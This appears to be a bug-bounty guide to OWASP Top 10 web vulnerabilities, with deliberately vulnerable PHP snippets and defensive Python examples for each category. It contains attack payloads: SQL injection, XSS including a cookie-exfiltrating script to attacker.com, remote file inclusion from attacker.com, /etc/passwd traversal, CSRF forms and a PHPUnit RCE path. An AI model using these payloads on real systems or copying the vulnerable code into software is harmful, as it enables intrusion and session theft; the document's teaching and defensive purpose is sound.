
OWASP Top 10 for bug bounty hunters

What the OWASP Top 10 is, and how each entry shows up in bug bounty work

 

OWASP Top 10

    The OWASP Top 10 is a list of the most critical web application security risks, published by the Open Web Application Security Project (OWASP) and updated every few years to reflect the current state of web security. The latest edition is OWASP Top 10 2021. The categories below do not use the 2021 names: they are closer to the older 2010/2013 editions (in 2021, XSS was folded into Injection, CSRF is no longer a separate entry, "failure to restrict URL access" became part of Broken Access Control, and Insecure Design and Server-Side Request Forgery were added). The bug classes themselves are still what a bug bounty hunter is looking for, so each one is described below with an example, a sample payload, and the vulnerable code pattern.

Injection attacks

where untrusted input is sent to an interpreter (SQL, an OS shell, LDAP, a template engine) as part of a query or command, so the attacker can change what the interpreter executes and read data or perform actions the application never intended.

example:-
                An attacker is able to execute SQL commands on a web application by injecting them into a login form field.
payloads:-
                  A payload for an SQL injection attack might look like this: ' OR 1=1 --
vulnerable code and payloads:-

// Vulnerable: form values are concatenated straight into the SQL string.
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

A payload for this vulnerability might be: ' OR 1=1 --
Submitted as the username, it turns the query into SELECT * FROM users WHERE username='' OR 1=1 -- ' AND password='...', which matches every row because the password check is commented out. The fix is a prepared statement (mysqli_prepare with bind_param) so the input is never parsed as SQL.
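To see the payload actually do its work, here is an added example (not code from the original post) in Python against an in-memory SQLite database, with the page's string-built query next to the parameterized fix. The users table, the alice account and its password are constructed for the demo.

```python
import sqlite3

# Constructed sample database. The password is stored in plaintext only to mirror
# the page's PHP snippet; the Insecure data storage section explains why that is wrong.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct horse battery')")
conn.commit()

PAYLOAD = "' OR 1=1 --"   # the page's payload, sent as the username


def build_query_vulnerable(username: str, password: str) -> str:
    """Same string splicing as the page's PHP: the input becomes part of the SQL text."""
    return (f"SELECT * FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def login_vulnerable(username: str, password: str) -> bool:
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row is not None


def login_parameterized(username: str, password: str) -> bool:
    """Fixed version: placeholders are bound by the driver, so a quote in the input
    is just data and can never close the string literal or start a comment."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run the page's payload through both versions and report what happened."""
    return {
        "query_seen_by_db": build_query_vulnerable(PAYLOAD, "anything"),
        "vulnerable_bypass": login_vulnerable(PAYLOAD, "anything"),
        "parameterized_bypass": login_parameterized(PAYLOAD, "anything"),
        "parameterized_real_login": login_parameterized("alice", "correct horse battery"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

SQLite is used only because it ships with Python; the `?` placeholders correspond to mysqli_prepare/bind_param in PHP. Note that in MySQL the `--` comment marker needs a space after it, which is why the page's payload ends with `-- ` before the rest of the query.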

Broken authentication and session management

where weak credentials, missing brute-force protection, or poorly handled session tokens let an attacker log in as another user.
example:-
                An attacker gains access to a user's account by guessing their password or replaying a stolen one; nothing stops them from trying thousands of candidates.
payloads:-
                A brute-force attack is a wordlist of candidate passwords rather than a single payload: password123, password124, password125, ...
vulnerable code and payloads:-

// Vulnerable: plaintext password comparison, no failed-attempt counter or rate limit,
// and no session_regenerate_id() after login (the pre-login session ID stays valid).
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $_SESSION['logged_in'] = true;
    header('Location: /dashboard');
}

A payload for this vulnerability is a username/password pair tried over and over, e.g. admin / password123. The same snippet is also SQL-injectable, as in the Injection section above; here the point is the missing lockout and the plaintext comparison.

Cross-site scripting (XSS)

where an attacker gets their own script into a page that the site serves to other users; the script then runs in the victim's browser with the victim's session, so it can read the page, steal tokens, or act as the user.
example:-
                 An attacker posts a comment containing JavaScript; every visitor who views the comments page runs it, and it can send their session cookie or form data to the attacker.
payloads:-
                  A payload for a cross-site scripting attack might look like this: <script>alert('XSS')</script> (the alert only proves execution; a real payload would exfiltrate data or perform actions as the user).
vulnerable code and payloads:-

// Vulnerable: the comment is echoed into the page without output encoding.
$comment = $_POST['comment'];
echo "<h1>Recent Comments</h1>";
echo "<p>$comment</p>";

A payload for this vulnerability might be: <script>alert('XSS')</script>
The fix is to encode for the output context: htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') for HTML text and quoted attributes, with a Content-Security-Policy header as a second layer.
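An added example (not from the original post) in Python showing the same echo with and without output encoding, and why the attribute context needs quoting as well as escaping. The comment text, the search-box markup and the second payload are constructed for the demo; html.escape plays the role of htmlspecialchars.

```python
import html

XSS_PAYLOAD = "<script>alert('XSS')</script>"
# Attribute-context payload (constructed): closes value="..." and adds an event handler.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(comment: str) -> str:
    """Mirrors the page's echo "<p>$comment</p>": the comment is pasted in verbatim."""
    return f"<h1>Recent Comments</h1>\n<p>{comment}</p>"


def render_fixed(comment: str) -> str:
    """HTML body context. html.escape(..., quote=True) is the Python equivalent of
    htmlspecialchars($comment, ENT_QUOTES, 'UTF-8')."""
    return f"<h1>Recent Comments</h1>\n<p>{html.escape(comment, quote=True)}</p>"


def render_search_box_vulnerable(query: str) -> str:
    """Attribute context with no encoding: a double quote ends the value."""
    return f'<input type="text" name="q" value="{query}">'


def render_search_box(query: str) -> str:
    """Attribute context done right: the value is quoted AND escaped. Escaping alone
    is not enough for an unquoted attribute, where a bare space starts a new one."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


def has_live_script(markup: str) -> bool:
    """Crude check for the demo only: did a real <script> tag or an unescaped
    onfocus=" handler survive into the output?"""
    lowered = markup.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_fixed(XSS_PAYLOAD))
    print(render_search_box_vulnerable(ATTR_PAYLOAD))
    print(render_search_box(ATTR_PAYLOAD))
```

The check function is deliberately naive; it exists only to make the difference between the two outputs visible. Encoding has to match where the value lands (HTML text, attribute, JavaScript string, URL), and a value placed inside a <script> block needs JavaScript encoding, not HTML encoding.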


Insecure data storage

where sensitive data (passwords, tokens, personal data) is kept in a form that anyone who can read the storage can use directly: plaintext, reversible encryption, or a file under the web root.

example:-
                  A web application stores user passwords in plain text, so a single database dump or a downloadable backup hands the attacker every account.
payloads:-
                    There is no injection payload for a storage weakness; the attacker needs some way to read the data. That can be another bug (the SQL injection above, used to run SELECT username, password FROM users), an exposed backup, or, for the snippet below, simply requesting /passwords.txt if the script writes into the web root.
vulnerable code and payloads:-

// Vulnerable: the raw password is written to a text file in the script's working directory.
$password = $_POST['password'];
file_put_contents('passwords.txt', $password);

A "payload" for this vulnerability is whatever reads the store: SELECT * FROM users against a plaintext users table, or GET /passwords.txt here. The fix is to store only a salted, slow hash (password_hash() / password_verify() in PHP) and to keep data files outside the document root.
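This section and Broken authentication above share one fix, so one added example (not code from the original post) covers both: passwords are stored as salted PBKDF2 hashes instead of plaintext, verification is constant-time and takes the same time for unknown users, and the account locks after five failures, which stops the wordlist attack from the Broken authentication section. The user table, the iteration count and the lockout numbers are assumptions for the demo.

```python
import hashlib
import hmac
import os
import time
from typing import Dict, List, Optional, Tuple

# PBKDF2-HMAC-SHA256 work factor. OWASP's current guidance is 600,000 iterations;
# this demo uses fewer so the brute-force loop below finishes quickly (assumption:
# raise it in production, or use argon2id/bcrypt through a library).
PBKDF2_ITERATIONS = 50_000
MAX_FAILURES = 5          # lock after this many failures ...
LOCKOUT_SECONDS = 900     # ... within this window (assumed policy values)


def hash_password(password: str) -> str:
    """Salted, slow hash for storage (the PHP equivalent is password_hash())."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Verified for unknown usernames so response time does not reveal whether a user exists.
DUMMY_HASH = hash_password(os.urandom(16).hex())


class LoginService:
    def __init__(self, users: Dict[str, str], clock=time.time):
        self.users = users          # username -> stored hash string, never plaintext
        self.clock = clock          # injectable so the lockout window can be tested
        self.failures: Dict[str, List[float]] = {}

    def _recent_failures(self, username: str) -> List[float]:
        now = self.clock()
        recent = [t for t in self.failures.get(username, []) if now - t < LOCKOUT_SECONDS]
        if username in self.failures:
            self.failures[username] = recent
        return recent

    def login(self, username: str, password: str) -> str:
        """Returns 'ok', 'denied' or 'locked'. Same answer for bad user and bad password."""
        if len(self._recent_failures(username)) >= MAX_FAILURES:
            return "locked"
        stored = self.users.get(username, DUMMY_HASH)
        if verify_password(password, stored) and username in self.users:
            self.failures.pop(username, None)
            return "ok"
        self.failures.setdefault(username, []).append(self.clock())
        return "denied"


def brute_force(service: LoginService, username: str,
                wordlist: List[str]) -> Tuple[Optional[str], int]:
    """The attack from the page's payload list: try each candidate until one works
    or the account locks. Returns (password_found, attempts_made)."""
    for attempts, guess in enumerate(wordlist, start=1):
        result = service.login(username, guess)
        if result == "ok":
            return guess, attempts
        if result == "locked":
            return None, attempts
    return None, len(wordlist)


if __name__ == "__main__":
    svc = LoginService({"alice": hash_password("correct horse battery")})
    print(brute_force(svc, "alice", ["password123", "password124", "password125",
                                      "password126", "password127", "correct horse battery"]))
```

Per-account lockout on its own can be turned into a denial of service against real users, so in practice it is combined with per-source rate limiting and CAPTCHAs; the stored format here (algorithm, iterations, salt, digest in one string) is the same idea as PHP's password_hash() output and lets the work factor be raised later without breaking existing hashes.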


Security misconfiguration

where the application or its platform ships with unsafe defaults, verbose errors, unnecessary features, or dangerous settings left enabled, so an attacker gets information or capabilities the application never meant to expose.

example:-
                    A PHP application runs with display_errors=On (leaking file paths and SQL in error messages), allow_url_include=On, directory listing enabled, and an admin console reachable at a guessable path with default credentials.
payloads:-
                  Probes for misconfiguration are requests for things that should not be there: /admin, /phpinfo.php, /.git/, or an error page triggered by a single quote to see whether debug output is on.
vulnerable code and payloads:-

// Vulnerable: a page name from the URL is passed straight to include().
$page = $_GET['page'];
include($page);

The snippet is really a file inclusion bug: ?page=../../../../etc/passwd reads local files, and if allow_url_include=On is set in php.ini the same line becomes remote file inclusion with ?page=http://attacker.com/shell.txt. The /admin payload belongs here when an admin console is simply left exposed. Fixes: map the parameter to an allowlist of template names, keep allow_url_include and display_errors off in production, and remove default accounts and sample pages.
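An added example (not from the original post) with the two halves of this section in Python: a small php.ini audit that flags the settings a tester checks first, and a safe replacement for include($_GET['page']) that maps the parameter to a file inside a template directory and refuses traversal and URLs. The php.ini fragment, the list of flagged directives and the template directory are constructed for the demo.

```python
import os
import tempfile
from typing import List, Optional

# Constructed php.ini fragment (sample input, not a real server's config).
SAMPLE_PHP_INI = """\
; constructed example
display_errors = On
allow_url_include = On
allow_url_fopen = On
expose_php = On
session.cookie_httponly = 0
"""

# Hardened values. The directives are standard php.ini settings; which ones to flag
# is this demo's choice.
EXPECTED = {
    "display_errors": "Off",          # stack traces and absolute paths leak to users
    "allow_url_include": "Off",       # turns include($page) into remote file inclusion
    "expose_php": "Off",              # X-Powered-By: PHP/x.y.z fingerprinting
    "session.cookie_httponly": "1",   # keep the session cookie away from document.cookie
}


def audit_php_ini(ini_text: str) -> List[str]:
    """Return one finding per directive that differs from the hardened value."""
    findings = []
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        expected = EXPECTED.get(key)
        if expected is not None and value.lower() != expected.lower():
            findings.append(f"{key} = {value} (expected {expected})")
    return findings


def resolve_page(page: str, template_dir: str) -> Optional[str]:
    """Safe replacement for include($_GET['page']): the parameter selects a file
    name inside template_dir; anything resolving outside it is refused."""
    if "\x00" in page or "://" in page or page.startswith(("\\\\", "/")):
        return None
    root = os.path.realpath(template_dir)
    candidate = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None   # ../ traversal escaped the template directory
    return candidate if os.path.isfile(candidate) else None


def setup_demo_templates() -> str:
    """Create a throwaway template directory with one legitimate page (constructed)."""
    template_dir = tempfile.mkdtemp(prefix="pages_")
    with open(os.path.join(template_dir, "home.php"), "w") as fh:
        fh.write("<?php echo 'home'; ?>")
    return template_dir


if __name__ == "__main__":
    print(audit_php_ini(SAMPLE_PHP_INI))
    d = setup_demo_templates()
    for probe in ("home", "../../../../etc/passwd", "http://attacker.com/shell.txt"):
        print(probe, "->", resolve_page(probe, d))
```

The containment check uses realpath so symlinks and `..` are resolved before the comparison; appending `.php` also means the parameter can never select an arbitrary file type even inside the directory.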

Cross-site request forgery (CSRF)

where an attacker's page makes the victim's browser send a request to a site the victim is logged in to; the browser attaches the session cookie automatically, so the site treats the forged request as the user's own.
example:-
                  A logged-in user visits the attacker's page, which silently submits a transfer request to their bank; the money moves because the bank only checks the session cookie.
payloads:-
                  A CSRF payload points at the vulnerable site, not at the attacker's. For a GET endpoint: <img src="https://bank.example/transfer?amount=10000">. For a POST endpoint like the one below, an auto-submitting form: <form action="https://bank.example/transfer" method="POST"><input type="hidden" name="amount" value="10000"></form><script>document.forms[0].submit()</script>
vulnerable code and payloads:-

// Vulnerable: no CSRF token and no Origin/Referer check; the amount is also spliced into SQL.
$transfer_amount = $_POST['amount'];
$query = "UPDATE accounts SET balance = balance + '$transfer_amount' WHERE account_id = 1";
mysqli_query($conn, $query);

A payload of the form <img src="http://attacker.com/csrf?amount=10000" /> would only send a request to the attacker's own server; to forge the transfer it has to target the bank's URL, and because this endpoint reads $_POST it needs the form version. The fix is a per-session anti-CSRF token checked on every state-changing request, SameSite=Lax or Strict on the session cookie, and rejecting requests whose Origin header is not the site's own.
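An added example (not code from the original post) in Python: the transfer endpoint with the missing checks added, an HMAC-based token bound to the session, and an exact-origin comparison. The request is modelled as a plain dict, and the server secret, the site origin bank.example and the session IDs are assumptions for the demo.

```python
import hashlib
import hmac
import os
import secrets
from urllib.parse import urlparse

SERVER_SECRET = os.urandom(32)        # assumption: one long-lived secret per deployment
SITE_ORIGIN = "https://bank.example"  # assumption: the victim site's origin

# What the attacker's page has to look like for a POST endpoint: an <img> tag can only
# send a GET, so it is an auto-submitting form pointed at the bank, not at attacker.com.
ATTACKER_PAGE = """<form id="f" action="https://bank.example/transfer" method="POST">
  <input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('f').submit()</script>"""


def issue_csrf_token(session_id: str) -> str:
    """Token tied to the session by HMAC, so it can be verified without server storage."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, _, mac = token.partition(".")
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return bool(mac) and hmac.compare_digest(mac.encode(), expected.encode())


def same_origin(url: str) -> bool:
    """Compare scheme and host exactly; a startswith() check would accept
    https://bank.example.attacker.com."""
    parsed = urlparse(url)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def handle_transfer(request: dict, balances: dict) -> str:
    """The page's endpoint with the checks it lacked. `request` is a constructed dict
    with 'cookies', 'headers' and 'form' keys."""
    session_id = request["cookies"].get("PHPSESSID")
    if not session_id:
        return "401 not logged in"
    origin = request["headers"].get("Origin") or request["headers"].get("Referer", "")
    if not same_origin(origin):
        return "403 cross-site request"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return "403 missing or invalid csrf token"
    try:
        amount = int(request["form"]["amount"])   # typed value, not spliced into SQL
    except (KeyError, ValueError):
        return "400 bad amount"
    balances[1] = balances.get(1, 0) + amount
    return "200 ok"


if __name__ == "__main__":
    token = issue_csrf_token("sess123")
    forged = {"cookies": {"PHPSESSID": "sess123"},
              "headers": {"Origin": "https://attacker.com"},
              "form": {"amount": "10000"}}
    print(handle_transfer(forged, {1: 0}))
```

Browsers send an Origin header on cross-site POSTs, so the origin check alone blocks the form above; the token is kept as well because Origin may be absent on some same-site requests and because the token survives a proxy that strips headers. The token is stateless (HMAC over session ID and nonce), which is why the check needs no server-side table of issued tokens.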

Using components with known vulnerabilities

where the application includes third-party libraries, frameworks, or tools with published vulnerabilities, so the attacker does not need a bug in your own code at all.
example:-
                  A web application ships an old version of a third-party library with a published vulnerability, and the exploit for it is already public.
payloads:-
                  A payload for an attack on a vulnerable component might look like this: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
vulnerable code and payloads:-

The application does not have to reference the file at all. The problem is deployment: Composer's vendor/ directory, including the dev-only PHPUnit package, is deployed inside the web root, so the file is reachable as https://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php. In the affected PHPUnit releases (before 4.8.28 and 5.x before 5.6.3, CVE-2017-9841) that script evaluates the body of a POST request as PHP, which is remote code execution with a single request.

A payload for this vulnerability is a POST to that path whose body is PHP code. Fixes: install with composer install --no-dev in production, keep vendor/ outside the document root, and run composer audit (or an SCA scanner) against the lock file.
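An added example (not from the original post) of the check a scanner or CI job does for this category: parse a composer.lock, compare each pinned version against an advisory table, and report the URL to probe when the package is one that is reachable under /vendor/. The lock file excerpt is constructed; the advisory table holds only the PHPUnit ranges from the public CVE-2017-9841 description and stands in for a real feed.

```python
import json
from typing import Dict, List, Tuple

# Constructed composer.lock excerpt (sample input; not from any real project).
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "monolog/monolog", "version": "2.9.1"},
    ],
    "packages-dev": [
        {"name": "phpunit/phpunit", "version": "5.6.2"},
    ],
})

Version = Tuple[int, int, int]

# Advisory table: package -> [(first_affected, fixed_in, note)]. The PHPUnit entries
# restate CVE-2017-9841 (eval-stdin.php, fixed in 4.8.28 and 5.6.3). In practice load
# this from `composer audit` or the GitHub Advisory Database rather than hard-coding it.
ADVISORIES: Dict[str, List[Tuple[Version, Version, str]]] = {
    "phpunit/phpunit": [
        ((0, 0, 0), (4, 8, 28), "CVE-2017-9841: eval-stdin.php remote code execution"),
        ((5, 0, 0), (5, 6, 3), "CVE-2017-9841: eval-stdin.php remote code execution"),
    ],
}

# Where the vulnerable file lands if vendor/ is inside the document root.
PROBE_PATHS = {
    "phpunit/phpunit": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
}


def parse_version(text: str) -> Version:
    """'v4.8.28', '5.6.2', '2.9', '1.2.3-beta' -> zero-padded (major, minor, patch)."""
    core = text.lstrip("v").split("-")[0].split("+")[0]
    parts = [int(p) for p in core.split(".")[:3] if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def find_vulnerable_packages(lock_json: str) -> List[dict]:
    """One finding per (package, advisory range) the pinned version falls into."""
    lock = json.loads(lock_json)
    findings = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            version = parse_version(pkg["version"])
            for first_affected, fixed_in, note in ADVISORIES.get(pkg["name"], []):
                if first_affected <= version < fixed_in:
                    findings.append({
                        "package": pkg["name"],
                        "version": pkg["version"],
                        "section": section,   # dev packages should never reach production
                        "fixed_in": ".".join(map(str, fixed_in)),
                        "advisory": note,
                        "probe": PROBE_PATHS.get(pkg["name"]),
                    })
    return findings


if __name__ == "__main__":
    for finding in find_vulnerable_packages(SAMPLE_COMPOSER_LOCK):
        print(finding)
```

The `section` field matters as much as the version: a vulnerable dev dependency is harmless if `composer install --no-dev` is used for the production build, and the probe path only works when vendor/ is served by the web server at all.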

Insufficient logging and monitoring

where security-relevant events (failed logins, access-control denials, input validation failures) are not recorded, or are recorded but never reviewed or alerted on, so an attacker can probe for hours without anyone noticing.
example:-
                    A web application records nothing when a login fails, so a brute-force run of thousands of attempts leaves no trace, and the eventual compromise is only discovered from its effects.
payloads:-
                  There is no exploit payload; the test is whether activity shows up. Send a burst of failed logins, then an unauthenticated probe such as GET /admin HTTP/1.1, and check whether either appears in the logs and whether anyone is alerted.
vulnerable code and payloads:-

// Vulnerable: the login outcome is recorded in the session only; nothing is written to a
// log on success or failure, and nothing counts failures per user or per source address.
$_SESSION['logged_in'] = true;

A request like GET /admin HTTP/1.1 from an unauthenticated client should produce a log line with the timestamp, source address, path and outcome. The fix is structured logging of authentication and authorization events (without secrets), shipped to a system that alerts on thresholds.
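An added example (not from the original post) in Python of both halves of the fix: an audit logger that writes one JSON line per event and drops secrets, and a sliding-window detector run over a constructed log of the brute-force run described above. The events, addresses, timestamps and thresholds are all constructed for the demo.

```python
import json
from collections import defaultdict
from datetime import datetime, timezone
from typing import List

SENSITIVE_FIELDS = {"password", "csrf_token", "session_id"}   # never written to the log


def audit_event(event: str, user: str, src_ip: str, ts: float, **extra) -> str:
    """One JSON line per security-relevant event; secrets are dropped before logging."""
    record = {
        "ts": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        "event": event,
        "user": user,
        "src_ip": src_ip,
    }
    record.update({k: v for k, v in extra.items() if k not in SENSITIVE_FIELDS})
    return json.dumps(record, sort_keys=True)


T0 = 1_700_000_000.0   # constructed base timestamp

# Constructed log: six failed logins for 'admin' from one address in 20 seconds,
# a success from the same address, then an unrelated failure and an /admin probe.
SAMPLE_LOG = [
    *[audit_event("login_failed", "admin", "203.0.113.5", T0 + 4 * i, password="hunter2")
      for i in range(6)],
    audit_event("login_success", "admin", "203.0.113.5", T0 + 25),
    audit_event("login_failed", "bob", "198.51.100.7", T0 + 30),
    audit_event("http_request", "-", "198.51.100.7", T0 + 31, path="/admin", status=401),
]


def detect_attacks(lines: List[str], threshold: int = 5, window: int = 60) -> List[dict]:
    """Sliding-window detector: alert when one source reaches `threshold` failures
    within `window` seconds, and again if a login then succeeds from that source."""
    failures = defaultdict(list)   # src_ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        rec = json.loads(line)
        ts = datetime.fromisoformat(rec["ts"]).timestamp()
        bucket = failures[rec["src_ip"]]
        while bucket and ts - bucket[0] > window:
            bucket.pop(0)
        if rec["event"] == "login_failed":
            bucket.append(ts)
            if len(bucket) == threshold:      # fire once per burst, not on every failure
                alerts.append({"type": "bruteforce", "src_ip": rec["src_ip"],
                               "user": rec["user"], "at": rec["ts"]})
        elif rec["event"] == "login_success" and len(bucket) >= threshold:
            alerts.append({"type": "success_after_failures", "src_ip": rec["src_ip"],
                           "user": rec["user"], "at": rec["ts"]})
    return alerts


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(line)
    print(detect_attacks(SAMPLE_LOG))
```

The second alert type is the one worth paging on: a success that follows a burst of failures from the same address is the signature of a guessed or stuffed password, whereas the burst alone may just be a confused user. Keying the window on source address as well as username is what catches password spraying across many accounts.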

Failure to restrict URL access

where a page or action is protected only by not being linked to, so anyone who knows or guesses the URL can use it. In the current OWASP list this is part of Broken Access Control.
example:-
                      An attacker reaches an admin function by guessing or brute-forcing the URL; the server runs it without checking whether the caller is an admin.
payloads:-
                  A payload for an attack on failure to restrict URL access might look like this: /admin/users/delete?id=1
vulnerable code and payloads:-

// Vulnerable: the page is chosen purely from the request; nothing checks the session's
// role before the admin page and its action are loaded.
$page = $_GET['page'];
include($page);

A payload for this vulnerability might be: /admin/users/delete?id=1
The fix is a server-side authorization check on every request, deny by default, and never trusting that an unlinked URL stays secret. Changing the id value to other users' accounts is the related insecure direct object reference (IDOR) variant.
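An added example (not from the original post) in Python of a deny-by-default dispatcher: every route has to appear in a policy table before any handler runs, so the admin delete action from the payload above is refused for guests and ordinary users, and a route that was shipped without a policy entry is refused for everyone. The user table, the routes and the session dicts are constructed for the demo.

```python
from typing import Dict, Optional, Set

# Constructed data: a user table and a route -> allowed-roles policy. Anything not in
# the policy is denied, so a new admin endpoint cannot be shipped unprotected by accident.
USERS: Dict[int, str] = {1: "alice", 2: "bob"}
ROUTE_POLICY: Dict[str, Set[str]] = {
    "/dashboard": {"user", "admin"},
    "/admin/users/delete": {"admin"},
}


class Forbidden(Exception):
    pass


def check_access(path: str, session: Optional[dict]) -> None:
    """Server-side check on every request. Hiding the link in the UI is not a control."""
    allowed = ROUTE_POLICY.get(path)
    if allowed is None:
        raise Forbidden("no policy for route (deny by default)")
    if not session or not session.get("logged_in"):
        raise Forbidden("not logged in")
    if session.get("role") not in allowed:
        raise Forbidden(f"role {session.get('role')!r} may not access {path}")


def dashboard(session: dict, params: dict) -> str:
    return f"200 hello {session['user']}"


def delete_user(session: dict, params: dict) -> str:
    user_id = int(params["id"])
    if user_id not in USERS:
        return "404 no such user"
    del USERS[user_id]
    return f"200 deleted user {user_id}"


def export_users(session: dict, params: dict) -> str:
    return "200 " + ",".join(USERS.values())


HANDLERS = {
    "/dashboard": dashboard,
    "/admin/users/delete": delete_user,
    "/admin/export": export_users,   # deliberately missing from ROUTE_POLICY
}


def handle_request(path: str, session: Optional[dict], params: dict) -> str:
    """Dispatcher that runs the authorization check before any handler code."""
    handler = HANDLERS.get(path)
    if handler is None:
        return "404 not found"
    try:
        check_access(path, session)
    except Forbidden as reason:
        return f"403 {reason}"
    return handler(session, params)


if __name__ == "__main__":
    admin = {"logged_in": True, "user": "alice", "role": "admin"}
    print(handle_request("/admin/users/delete", None, {"id": "1"}))
    print(handle_request("/admin/users/delete", admin, {"id": "2"}))
    print(handle_request("/admin/export", admin, {}))
```

The check is in the dispatcher rather than inside each handler so a developer cannot forget it; the cost is that a handler with no policy entry is unreachable until someone writes one, which is the intended failure mode.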

Missing input validation and output encoding

where the application has none of the basic controls that the categories above rely on, such as validating input on the server, encoding output for its context, and encrypting data in transit and at rest. This is not a separate entry in the OWASP list; it is the common cause behind injection and XSS.
example:-
                  A web application trusts form fields as-is: the same field feeds a SQL query unescaped and is echoed back into the page unencoded, so it is both injectable and scriptable.
payloads:-
                A cookie-stealing XSS payload, which is what an attacker sends once output encoding is found to be missing: <script>document.location='http://attacker.com/'+document.cookie</script>
vulnerable code and payloads:-

// The same login snippet as in the Injection section: input goes straight into SQL.
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

A payload for this vulnerability might be: <script>document.location='http://attacker.com/'+document.cookie</script>
That payload only works where the value is also reflected into a page; against the query above the relevant payload is the SQL injection one. Setting the session cookie HttpOnly keeps it out of document.cookie even when XSS is present.


The OWASP Top 10 is intended to provide a high-level overview of the most critical web application security risks. It is not a comprehensive list of all web security risks, but it is a good starting point for organizations to assess their own security posture.


